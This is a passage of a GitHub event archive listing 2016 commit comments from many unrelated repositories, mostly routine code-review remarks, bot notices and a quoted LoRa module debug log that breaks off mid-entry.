{"id":"4517934179","type":"CommitCommentEvent","actor":{"login":"hugoledoux"},"repo":{"name":"tudelftgeomatics/thesis"},"payload":{"comment":{"id":18902784,"position":2,"line":1,"path":"potentialtopics/deltares/index.md","commit_id":"248b895c1528a92082f74bf487c4c8b62ade9cbb","created_at":"2016-09-05T18:01:01Z","updated_at":"2016-09-05T18:01:01Z","body":"@wilkoquak I think you added these lines by mistakes (vi did that?). I removed them and now the 2 pages are building correctly (see next commit)"}},"created_at":"2016-09-05T18:01:01Z"}
{"id":"4517934756","type":"CommitCommentEvent","actor":{"login":"lmmx"},"repo":{"name":"lmmx/shots"},"payload":{"comment":{"id":18902789,"position":null,"line":null,"path":null,"commit_id":"b89f3f90a6431d734671d7d0fa3f3b6d894063ce","created_at":"2016-09-05T18:01:17Z","updated_at":"2016-09-05T18:01:17Z","body":"via https://books.google.co.uk/books?id=o1XVCgAAQBAJ&pg=PA708&lpg=PA708&dq=Friedrich+Hasen%C3%B6hrl&source=bl&ots=KwIVnQZ4pb&sig=bQx1ksYSWufmjfe-c7WtUMlU0rE&hl=en&sa=X&ved=0ahUKEwju-vyw5vjOAhUFLMAKHY8VAFsQ6AEIOTAE#v=onepage&q&f=false\r\npeople: Friedrich Hasenöhrl, Erwin Schrödinger, Ludwig Boltzmann"}},"created_at":"2016-09-05T18:01:17Z"}
{"id":"4517935426","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"americool/sep-assignments"},"payload":{"comment":{"id":18902790,"position":47,"line":47,"path":"02-algorithms/1-Intro/intro_algos_answers.txt","commit_id":"b4f9f5f92178a94e8803691b2e28747324c5468c","created_at":"2016-09-05T18:01:33Z","updated_at":"2016-09-05T18:01:33Z","body":"Didn't you already do this?"}},"created_at":"2016-09-05T18:01:33Z"}
{"id":"4517936942","type":"CommitCommentEvent","actor":{"login":"alvarollmenezes"},"repo":{"name":"prodest/api-sep"},"payload":{"comment":{"id":18902793,"position":null,"line":null,"path":null,"commit_id":"c2e3b43bfc7fadc842c248bd545f74dd4fb46e15","created_at":"2016-09-05T18:02:14Z","updated_at":"2016-09-05T18:02:14Z","body":"Closes prodest/es-na-palma-da-mao-backend#24"}},"created_at":"2016-09-05T18:02:14Z"}
{"id":"4517937662","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18902795,"position":13,"line":12,"path":"app/services/import_feed_service.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-05T18:02:33Z","updated_at":"2016-09-05T18:02:33Z","body":"Because  it wraps all the inserts into one transaction, instead of having each model created within its own transaction."}},"created_at":"2016-09-05T18:02:33Z"}
{"id":"4517938160","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18902796,"position":15,"line":23,"path":"app/directives/show-more.js","commit_id":"81d9bbccbbdca7092836ee054ed91b0663a88fd0","created_at":"2016-09-05T18:02:46Z","updated_at":"2016-09-05T18:02:46Z","body":"Пояснишь, почему ты используешь 'scope.filteredTodos' а не 'newVal' ?"}},"created_at":"2016-09-05T18:02:46Z"}
{"id":"4517942399","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18902802,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T18:04:42Z","updated_at":"2016-09-05T18:04:42Z","body":"Thanks @sdumitriu  for the explanations! \r\n\r\nLooks like a bug in Eclipse. It works fine in IntelliJ IDEA and when using the javadoc tool. Some time back (when I fixed all javadoc lint failures in commons and rendering) I researched the options to display code in javadoc, trying out the various options and in the end the following one is the best I had found:\r\n\r\n````\r\n     * @param fullQuery the full Elastic Search query used to search for installs. For example:\r\n     *        <pre>{@code\r\n     *            {\r\n     *              \"query\" : {\r\n     *                \"term\": { \"distributionVersion\" : \"5.2\" }\r\n     *              }\r\n     *            }\r\n     *        }</pre>\r\n`````\r\n\r\nI don't remember all the reasons (there were a few) but I remember the main one which is that we don't need to escape characters inside it and this makes the code example a lot more readable and easy to write (and less prone to errors when converted to HTML).\r\n\r\nThus this is something I'd like to promote as a best practice. However it's a pity if Eclipse fails to read it. Maybe there's an opened bug and it's fixed in some recent versions?"}},"created_at":"2016-09-05T18:04:42Z"}
{"id":"4517942509","type":"CommitCommentEvent","actor":{"login":"nrhint"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":18902803,"position":null,"line":null,"path":null,"commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-05T18:04:45Z","updated_at":"2016-09-05T18:04:45Z","body":"I fixed the problem."}},"created_at":"2016-09-05T18:04:45Z"}
{"id":"4517942804","type":"CommitCommentEvent","actor":{"login":"evertongx"},"repo":{"name":"nfephp-org/sped-cte"},"payload":{"comment":{"id":18902804,"position":6,"line":447,"path":"src/Auxiliar/Response.php","commit_id":"df7475f109b600250724dc00fa541b2d7be6e8d9","created_at":"2016-09-05T18:04:53Z","updated_at":"2016-09-05T18:04:53Z","body":"@samuelbasso  Deu problema comigo nessa parte, pois não tinha o campo nProt. Porque foi retirado?"}},"created_at":"2016-09-05T18:04:53Z"}
{"id":"4517943214","type":"CommitCommentEvent","actor":{"login":"nbp"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18902806,"position":null,"line":null,"path":null,"commit_id":"ba70ce28ae4032a4674634c2a00615f7a0908357","created_at":"2016-09-05T18:05:01Z","updated_at":"2016-09-05T18:05:01Z","body":"The problem with aliases is that they require one extra hop to re-enter Nixpkgs expression.  Thus the assumption which is the root of the automatic patching does not hold, as the aliasing through `pkgs` adds  one extra hop to a package, and not a dependency of a package.\r\n\r\nIf we want to fix this aliasing problem, we should move these aliases computation into aliases.nix, and move aliases.nix extends after customOverrides in top-level/default.nix .\r\n\r\nThe simplest work-around for the release would be to revert the ~100 patches which are converting the aliases into `= self.`, and also add a test that aliases are expected to be overwritten when the root one is.\r\n"}},"created_at":"2016-09-05T18:05:01Z"}
{"id":"4517946500","type":"CommitCommentEvent","actor":{"login":"dragonCASTjosh"},"repo":{"name":"luchete80/lumixengine_data"},"payload":{"comment":{"id":18902810,"position":9,"line":51,"path":"Diary.txt","commit_id":"cc60d59e5d2d73fea0d7a8c5e7ebfc919298624a","created_at":"2016-09-05T18:06:22Z","updated_at":"2016-09-05T18:06:22Z","body":"i have an interest in looking into SSS, once you get the core PBR merged to master im willing to give it a look"}},"created_at":"2016-09-05T18:06:22Z"}
{"id":"4517947968","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18902813,"position":35,"line":35,"path":"lib/exabgp/bgp/message/update/attribute/linkstate.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:07:08Z","updated_at":"2016-09-05T18:07:08Z","body":"if packed is not None:\r\n    self._packed = packed\r\n    return"}},"created_at":"2016-09-05T18:07:08Z"}
{"id":"4517948026","type":"CommitCommentEvent","actor":{"login":"rschoem"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18902814,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T18:07:09Z","updated_at":"2016-09-05T18:07:09Z","body":" I asked @hackthelegacy to provide some test hashes from real AS/400's (he owns a number of \"play\" systems). I also asked him to change the IBMiscanner tool to output DES hashes in the correct format.\r\n\r\nBTW: The format string was just copied from the racf format string (because the racf hashes are very similar to the as400-des hashes, the only differences are for userids and passwords of more than 8 characters. The racf string also has a * after the format tag)"}},"created_at":"2016-09-05T18:07:09Z"}
{"id":"4517951714","type":"CommitCommentEvent","actor":{"login":"l3d00m"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18902818,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-05T18:08:47Z","updated_at":"2016-09-05T18:08:47Z","body":"Hm, the go offline would be still a littile bit hidden, but I agree that the rest would fit in the normal settings."}},"created_at":"2016-09-05T18:08:47Z"}
{"id":"4517951998","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902819,"position":null,"line":null,"path":null,"commit_id":"c397719afa64853b642e9463ef139fde1e0db460","created_at":"2016-09-05T18:08:54Z","updated_at":"2016-09-05T18:08:54Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/402/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T18:08:54Z"}
{"id":"4517953428","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18902824,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-05T18:09:32Z","updated_at":"2016-09-05T18:09:32Z","body":"Yeah that's still hidden. Not sure where else to put that though. "}},"created_at":"2016-09-05T18:09:32Z"}
{"id":"4517955353","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"safarov-ua/lemon-school"},"payload":{"comment":{"id":18902825,"position":28,"line":28,"path":"5/index.html","commit_id":"6e09eeda1e03ac3ebd1c98114b70bc27929d34ca","created_at":"2016-09-05T18:10:25Z","updated_at":"2016-09-05T18:10:25Z","body":"```\r\nh2 {\r\n  clear: both;\r\n}\r\n```"}},"created_at":"2016-09-05T18:10:25Z"}
{"id":"4517955920","type":"CommitCommentEvent","actor":{"login":"gzoller"},"repo":{"name":"gzoller/ScalaJack"},"payload":{"comment":{"id":18902827,"position":null,"line":null,"path":null,"commit_id":"b7e41e03df511b205857a1a26fbf8385d9730630","created_at":"2016-09-05T18:10:40Z","updated_at":"2016-09-05T18:10:40Z","body":"May have discovered a clue...  if I try substituting the passed-in types in Context to tpe like this:\r\n```\r\n    val subsType = tpe.substituteTypes(tpe.typeConstructor.typeParams, superParamTypes)\r\n    println(s\"::: $tpe: \" + tpe.substituteTypes(tpe.typeConstructor.typeParams, superParamTypes))\r\n```\r\n\r\nI then see output for the Foo cases with type 'D', meaning a case class' type substitution isn't working quite right.  Afraid of that.  Due to all the accessor stuff case classes are getting their types very differently than the fields in a polytype, so that needs to be figured out.  _Logically_, we just have to support a similar kind of cascading type substitution the case class adapter as we have in the poly adapter and maybe, just maybe, that'll work."}},"created_at":"2016-09-05T18:10:40Z"}
{"id":"4517957464","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902831,"position":68,"line":77,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T18:11:20Z","updated_at":"2016-09-05T18:11:20Z","body":"Sure - they should be sanitized. The point is that it is basically impossible to sanitize Angular templates in any reliable way. So you can use user content (sanitized) but only outside of the Angular template.\r\n\r\nIs there some way I could make this more clear?"}},"created_at":"2016-09-05T18:11:20Z"}
{"id":"4517957841","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18902833,"position":5,"line":5,"path":"app/models/product.rb","commit_id":"b55e2141e1221e7c4a2d14c4efec0a4a0edcb656","created_at":"2016-09-05T18:11:33Z","updated_at":"2016-09-05T18:11:33Z","body":"Exactly. :)"}},"created_at":"2016-09-05T18:11:33Z"}
{"id":"4517958149","type":"CommitCommentEvent","actor":{"login":"lmmx"},"repo":{"name":"lmmx/shots"},"payload":{"comment":{"id":18902835,"position":null,"line":null,"path":null,"commit_id":"b14c737959335dc815991c1fed53f9b9289b2bea","created_at":"2016-09-05T18:11:40Z","updated_at":"2016-09-05T18:11:40Z","body":"via https://books.google.co.uk/books?id=4U7vCAAAQBAJ&pg=PA205&lpg=PA205&source=bl&ots=QyWJOUK415&sig=TzTF5rSL6gEO059-GRLeBV2wpls&hl=en&sa=X&ved=0ahUKEwiYz8zb6PjOAhVELcAKHaZaBsEQ6AEIHDAA#v=onepage&q&f=false\r\npeople: Franz Brentano, Ludwig Boltzmann\r\nin: \"Ludwig Boltzmann His Later Life and Philosophy, 1900–1906: Book One edited by J.T. Blackmore\""}},"created_at":"2016-09-05T18:11:40Z"}
{"id":"4517958235","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902836,"position":7,"line":37,"path":"src/ng/parse.js","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T18:11:41Z","updated_at":"2016-09-05T18:11:41Z","body":"good spot"}},"created_at":"2016-09-05T18:11:41Z"}
{"id":"4517958232","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18902837,"position":12,"line":26,"path":"app/index.html","commit_id":"a64479d04cbf2f0d8351995d4c6de88f2f30b44e","created_at":"2016-09-05T18:11:43Z","updated_at":"2016-09-05T18:11:43Z","body":"Огонь. Она точно раз отображается? Может все-же отдельную переменную которую обновлять как только массив был изменен. И добавить массив для отображения только - заменить везде твой 'main.todoArr' на 'main.filteredTodos' - по клику обновлять конкретный объект, а оригинал не трогать, при этом меняя то самое значение которое сюда нужно подставлять. К примеру. Уж больно некрасивая надпись в 'ng-bind', на мой взгляд"}},"created_at":"2016-09-05T18:11:43Z"}
{"id":"4517959578","type":"CommitCommentEvent","actor":{"login":"bsiege"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":18902841,"position":null,"line":null,"path":null,"commit_id":"22c8d8d0417f4a11d41b5d430b5e1769518e0f52","created_at":"2016-09-05T18:12:23Z","updated_at":"2016-09-05T18:12:23Z","body":"And where should be the actual configuration?"}},"created_at":"2016-09-05T18:12:23Z"}
{"id":"4517959610","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"dchest/scrypt-async-js"},"payload":{"comment":{"id":18902842,"position":null,"line":null,"path":null,"commit_id":"4b365e51b412284fb56d40675de134a3694bfabb","created_at":"2016-09-05T18:12:24Z","updated_at":"2016-09-05T18:12:24Z","body":"@dchest: why this choice?"}},"created_at":"2016-09-05T18:12:24Z"}
{"id":"4517962238","type":"CommitCommentEvent","actor":{"login":"Kiniamaro"},"repo":{"name":"tsudoko/long-live-pomf"},"payload":{"comment":{"id":18902849,"position":null,"line":null,"path":null,"commit_id":"a302188b4871fbdbbb3772a458133768af284a36","created_at":"2016-09-05T18:13:31Z","updated_at":"2016-09-05T18:13:31Z","body":":'^)"}},"created_at":"2016-09-05T18:13:31Z"}
{"id":"4517963151","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18902851,"position":38,"line":38,"path":"lib/exabgp/bgp/message/update/attribute/linkstate.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:13:57Z","updated_at":"2016-09-05T18:13:57Z","body":"```\r\nself.tlvs = dict(tlv.split(':',1) for tlv in tlvs)\r\n```"}},"created_at":"2016-09-05T18:13:57Z"}
{"id":"4517965330","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18902854,"position":44,"line":44,"path":"lib/exabgp/bgp/message/update/attribute/linkstate.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:14:57Z","updated_at":"2016-09-05T18:14:57Z","body":"```\r\nself.tlv_types.iteritems() ???\r\n```"}},"created_at":"2016-09-05T18:14:57Z"}
{"id":"4517967180","type":"CommitCommentEvent","actor":{"login":"gebner"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":18902856,"position":null,"line":null,"path":null,"commit_id":"e0494ec096a6b65884dbc15c48e0dbd0568623cd","created_at":"2016-09-05T18:15:44Z","updated_at":"2016-09-05T18:15:44Z","body":"The other possibility is that it depends on the installed software.  For example, the default MaxSAT solver for the grammar minimization is `bestAvailableMaxSatSolver`--this will choose a different solver based on what is installed.  It is quite possible that something goes just slightly wrong with let's say `qmaxsat`, and I can't reproduce it because I don't have `qmaxsat` installed."}},"created_at":"2016-09-05T18:15:44Z"}
{"id":"4517967631","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18902858,"position":45,"line":45,"path":"lib/exabgp/bgp/message/update/attribute/linkstate.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:15:55Z","updated_at":"2016-09-05T18:15:55Z","body":"invert the test\r\n'''\r\nif not tlv_type in self.tlvs:  # not .keys required\r\n    continue\r\n'''"}},"created_at":"2016-09-05T18:15:55Z"}
{"id":"4517967736","type":"CommitCommentEvent","actor":{"login":"zackhall"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18902859,"position":null,"line":null,"path":null,"commit_id":"aa9141462e303efd8fafd88f2de436e2b1844f69","created_at":"2016-09-05T18:15:58Z","updated_at":"2016-09-05T18:15:58Z","body":"Interesting – what was going on here? Why'd we need to defer? "}},"created_at":"2016-09-05T18:15:58Z"}
{"id":"4517967758","type":"CommitCommentEvent","actor":{"login":"springcoil"},"repo":{"name":"pymc-devs/pymc3"},"payload":{"comment":{"id":18902860,"position":null,"line":null,"path":null,"commit_id":"cce0bf677ce8a85a5a70378a61ff0c365d362b18","created_at":"2016-09-05T18:15:59Z","updated_at":"2016-09-05T18:15:59Z","body":"Lgtm"}},"created_at":"2016-09-05T18:15:59Z"}
{"id":"4517971091","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18902864,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-05T18:17:25Z","updated_at":"2016-09-05T18:17:25Z","body":"```quote\r\ni found the reason why this is happening.\r\n when we change EventAI to GuardianAI for creature in the world (not summoned), in this case creature has no owner.\r\nadded:\r\nERROR:FactorySelector: creature pet / guardian not up-to-date on entry: 18706! it shouldn't have EventAI - GuardianAI will be used.\r\nthis is wrong. npc 18706 spawned in world.\r\n```\r\n@boxa don't know what DB you are using... but this creature should never ever be spawned manualy in world.\r\nHe is c.16925 'Bonechewer Raider' guardian .... summoned via spell - 32723"}},"created_at":"2016-09-05T18:17:25Z"}
{"id":"4517971393","type":"CommitCommentEvent","actor":{"login":"christianfrei"},"repo":{"name":"silvanheller/vitrivr-ui"},"payload":{"comment":{"id":18902865,"position":13,"line":181,"path":"js/init.js","commit_id":"a1b431573d9544814390c4500d42f2bd9c750e37","created_at":"2016-09-05T18:17:33Z","updated_at":"2016-09-05T18:17:33Z","body":"Fixed in 96d98be800ad18739b90ff29a9030baacda82ad2"}},"created_at":"2016-09-05T18:17:33Z"}
{"id":"4517972303","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"daniil-trenin/lemon-school"},"payload":{"comment":{"id":18902867,"position":null,"line":null,"path":null,"commit_id":"5430034e6ab23f8ffd42604d3e5c9d5a6f9674dd","created_at":"2016-09-05T18:17:57Z","updated_at":"2016-09-05T18:17:57Z","body":"не понял сути, неверно расчитал ширины и `left`"}},"created_at":"2016-09-05T18:17:57Z"}
{"id":"4517972957","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18902869,"position":null,"line":null,"path":null,"commit_id":"4f832de84beef1f67ad74f322f00124b8e8ab869","created_at":"2016-09-05T18:18:15Z","updated_at":"2016-09-05T18:18:15Z","body":"Well it works.\r\nBut now that probepart is putting stuff out in the correct order, you might want to do something about the \"sort -u\"'s in /usr/local/pup_event/frontend_change that will muck it up."}},"created_at":"2016-09-05T18:18:15Z"}
{"id":"4517974073","type":"CommitCommentEvent","actor":{"login":"bsiege"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":18902870,"position":null,"line":null,"path":null,"commit_id":"22c8d8d0417f4a11d41b5d430b5e1769518e0f52","created_at":"2016-09-05T18:18:43Z","updated_at":"2016-09-05T18:18:43Z","body":"ok found it under (FreeBSD) /usr/local/etc/webmin/ipfw/version changed value to 2, restarted webmin. Value is overwritten with 1 again...."}},"created_at":"2016-09-05T18:18:43Z"}
{"id":"4517978226","type":"CommitCommentEvent","actor":{"login":"jvolkening"},"repo":{"name":"OpenSMTPD/OpenSMTPD-extras"},"payload":{"comment":{"id":18902882,"position":null,"line":null,"path":null,"commit_id":"ec33d850725b0edc43250e22cef858449011f632","created_at":"2016-09-05T18:20:30Z","updated_at":"2016-09-05T18:20:30Z","body":"This commit broke the build process for me on Debian GNU/Linux, with a bunch of the following type of error:\r\n\r\n`../../../api/smtpd-defines.h:23:6: error: redeclaration of ‘enum smtp_proc_type’\r\nIn file included from ../../../api/table_api.c:34:0:\r\n../../../api/smtpd-defines.h:23:6: note: originally defined here\r\n enum smtp_proc_type {\r\n      ^\r\n`\r\n\r\nThe previous commit compiles okay."}},"created_at":"2016-09-05T18:20:30Z"}
{"id":"4517978643","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902884,"position":null,"line":null,"path":null,"commit_id":"c0979b5b1774fcc893a3b1db7696666ec6a396c6","created_at":"2016-09-05T18:20:40Z","updated_at":"2016-09-05T18:20:40Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/403/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T18:20:40Z"}
{"id":"4517980533","type":"CommitCommentEvent","actor":{"login":"Augusto-Moura"},"repo":{"name":"daniel-braga/aurelia-framework"},"payload":{"comment":{"id":18902886,"position":null,"line":null,"path":null,"commit_id":"6f9a0a493fde09556e928bba34fd6123849e061a","created_at":"2016-09-05T18:21:30Z","updated_at":"2016-09-05T18:21:30Z","body":"Ainda tá trabalhando na tradução por pull requests? Fiquei com dúvida porque vi que o pull request original deram um merge já. Por que se ainda for assim tava interessado em dar um fork e ajudar, se você aceitar claro"}},"created_at":"2016-09-05T18:21:30Z"}
{"id":"4517980975","type":"CommitCommentEvent","actor":{"login":"naspeh"},"repo":{"name":"superdesk/superdesk-core"},"payload":{"comment":{"id":18902887,"position":null,"line":null,"path":null,"commit_id":"d4881bbf7ad91a9c48312bbc03471ea726199583","created_at":"2016-09-05T18:21:42Z","updated_at":"2016-09-05T18:21:42Z","body":"Sorry for direct commit to master, forgot to correct `origin` properly."}},"created_at":"2016-09-05T18:21:42Z"}
{"id":"4517981046","type":"CommitCommentEvent","actor":{"login":"scoder"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":18902888,"position":120,"line":1278,"path":"Objects/genobject.c","commit_id":"29f7522d3a0b4ad06eca689940595d4e53ac4675","created_at":"2016-09-05T18:21:45Z","updated_at":"2016-09-05T18:21:45Z","body":"Since this call can fail, it should have a NULL check for e."}},"created_at":"2016-09-05T18:21:45Z"}
{"id":"4517981783","type":"CommitCommentEvent","actor":{"login":"MAlexJ"},"repo":{"name":"technology-info/technology-info.github.io"},"payload":{"comment":{"id":18902891,"position":null,"line":null,"path":null,"commit_id":"f8de7743c59d026e168868be0a2ce06a9cfcaf33","created_at":"2016-09-05T18:22:07Z","updated_at":"2016-09-05T18:22:07Z","body":"нет изображения P8090592.JPG в папке images"}},"created_at":"2016-09-05T18:22:07Z"}
{"id":"4517985032","type":"CommitCommentEvent","actor":{"login":"pareddy113"},"repo":{"name":"pareddy113/pareddy113.github.io"},"payload":{"comment":{"id":18902898,"position":null,"line":null,"path":null,"commit_id":"d5d7ba652119d9509c33803b32bdadbf6ac51c53","created_at":"2016-09-05T18:23:40Z","updated_at":"2016-09-05T18:23:40Z","body":"remove videos"}},"created_at":"2016-09-05T18:23:40Z"}
{"id":"4517985263","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"JakimOFF/lemon-school"},"payload":{"comment":{"id":18902900,"position":24,"line":24,"path":"4+/css/style.css","commit_id":"672dd37d07dfe17c6632a524b0d14e80d31a1c7a","created_at":"2016-09-05T18:23:46Z","updated_at":"2016-09-05T18:23:46Z","body":"при большом количестве контента внутри `.container` сайдбары остановятся на этой высоте, что не реализует поставленную задачу"}},"created_at":"2016-09-05T18:23:46Z"}
{"id":"4517985757","type":"CommitCommentEvent","actor":{"login":"kevinkurpe"},"repo":{"name":"kevinkurpe/therma"},"payload":{"comment":{"id":18902902,"position":16,"line":66,"path":"app.js","commit_id":"2d820c1d1e417618931492146e56d15bde0dca06","created_at":"2016-09-05T18:23:59Z","updated_at":"2016-09-05T18:23:59Z","body":"The port that this node server is listening to is now set via a variable."}},"created_at":"2016-09-05T18:23:59Z"}
{"id":"4517986282","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"JakimOFF/lemon-school"},"payload":{"comment":{"id":18902904,"position":15,"line":15,"path":"4+/index.html","commit_id":"672dd37d07dfe17c6632a524b0d14e80d31a1c7a","created_at":"2016-09-05T18:24:14Z","updated_at":"2016-09-05T18:24:14Z","body":"это лишнее, можно использовать псевдоэлемент"}},"created_at":"2016-09-05T18:24:14Z"}
{"id":"4517986983","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18902905,"position":null,"line":null,"path":null,"commit_id":"4f832de84beef1f67ad74f322f00124b8e8ab869","created_at":"2016-09-05T18:24:32Z","updated_at":"2016-09-05T18:24:32Z","body":"done in https://github.com/puppylinux-woof-CE/woof-CE/commit/4899eab685b79e33e7a1fe00ca5a260d54e4ea7f\r\n\r\n"}},"created_at":"2016-09-05T18:24:32Z"}
{"id":"4517987921","type":"CommitCommentEvent","actor":{"login":"GreenLunar"},"repo":{"name":"assaultcube/AC"},"payload":{"comment":{"id":18902908,"position":92,"line":92,"path":"config/convert_pre_v1.2_mapconfig.sh","commit_id":"9c964d95b457785310a3ecc1d2c96a2ec76fefe8","created_at":"2016-09-05T18:25:00Z","updated_at":"2016-09-05T18:25:00Z","body":"I think it should be: `if [ \"$1\" = \"-os\" || \"$1\" = \"-osp\" ]; then`"}},"created_at":"2016-09-05T18:25:00Z"}
{"id":"4517989031","type":"CommitCommentEvent","actor":{"login":"Jswoon"},"repo":{"name":"wirelessopensource/lora_shield_arduino"},"payload":{"comment":{"id":18902911,"position":null,"line":null,"path":null,"commit_id":"fc4892b973913a326c5c68cfbc18c407c0c7d352","created_at":"2016-09-05T18:25:30Z","updated_at":"2016-09-05T18:25:30Z","body":"​Hi Pedro,\n\nThe two attached files are the debug 2 log of Transmitting and Receiving\npart of the chip.\n\nHope to hear from you soon.\n\nThank you.\n\nBest Regards,\nShen​\n\nOn Tue, Sep 6, 2016 at 1:59 AM, Jun Shen Woon <jswoon96@gmail.com> wrote:\n\n> Hi Pedro,\n>\n> Thank you for responding to my problem. I followed your instruction to\n> change the SX 1278_debug_mode variable to 2 in SX1278.h.\n>\n> For Sending log,\n> sx1278 module and Arduino: send two packets (One to an addrees and another\n> one in broadcast)\n>\n> Starting 'ON'\n>\n> Starting 'setMaxCurrent'\n> ## Reading:  ## Register 1:  9\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register B:  3B\n> ## Writing:  ## Register 1:  9\n> ## Setting ON with maximum current supply ##\n>\n>\n> Starting 'setLORA'\n> ## Writing:  ## Register 1:  0\n> ## Writing:  ## Register 1:  80\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 23:  FF\n> ## Writing:  ## Register 1D:  72\n> ## Writing:  ## Register 1E:  70\n> ## Writing:  ## Register 26:  0\n> ## Reading:  ## Register 1:  81\n> ## LoRa set with success ##\n>\n> Setting power ON: SUCCESS\n>\n> Starting 'setMode'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n>\n> Starting 'setCR'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Reading:  ## Register 1D:  72\n> ## Writing:  ## Register 1D:  72\n> ## Reading:  ## Register 1D:  72\n>\n> Starting 'isCR'\n> ## Coding Rate 1 has been successfully set ##\n>\n> ## Writing:  ## Register 1:  81\n>\n> Starting 'setSF'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Reading:  ## Register 1E:  70\n> ## Reading:  ## Register 26:  0\n>\n> Starting 'getBW'\n> ## Reading:  ## Register 1D:  72\n>\n> Starting 'isBW'\n> ## Bandwidth is 7 ##\n>\n> ## Writing:  ## Register 31:  3\n> ## Writing:  ## Register 37:  A\n> ## Writing:  ## Register 1E:  C3\n> ## Writing:  ## Register 26:  C\n> ## Reading:  ## Register 1E:  C3\n> ## Reading:  ## Register 26:  C\n>\n> Starting 'getBW'\n> ## Reading:  ## Register 1D:  72\n>\n> Starting 'isBW'\n> ## Bandwidth is 7 ##\n>\n> ## Writing:  ## Register 1:  81\n>\n> Starting 'isSF'\n> ## Spreading factor 12 has been successfully set ##\n>\n>\n> Starting 'setBW'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Reading:  ## Register 1D:  